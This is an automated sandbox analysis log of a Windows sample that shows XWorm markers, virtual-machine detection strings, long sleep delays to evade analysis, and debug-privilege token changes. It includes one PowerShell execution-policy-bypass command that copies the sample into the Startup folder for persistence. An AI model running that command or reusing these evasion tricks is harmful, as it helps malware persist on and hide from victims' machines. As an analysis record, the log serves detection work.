Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\KFPYr6f43H.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Memory allocated: 1870000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Memory allocated: 31F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Memory allocated: 51F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Memory allocated: C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Memory allocated: 29A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Memory allocated: 49A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Window / User API: threadDelayed 1163 Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Window / User API: threadDelayed 8650 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3044 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4453 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1800 Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe TID: 7992 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep count: 3044 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 162 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe TID: 8044 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe TID: 8032 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444 Thread sleep count: 4453 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5764 Thread sleep count: 1800 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5824 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\MSVFW32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, KFPYr6f43H.exe, 00000007.00000002.2078607715.0000000000D20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Desktop\KFPYr6f43H.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' -Force Jump to behavior
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000035BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000035BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\dq@\dq'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000035BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000035BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-dq
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000035BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dq'PING!<Xwormmm>Program Manager<Xwormmm>0Tedq
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Users\user\Desktop\KFPYr6f43H.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
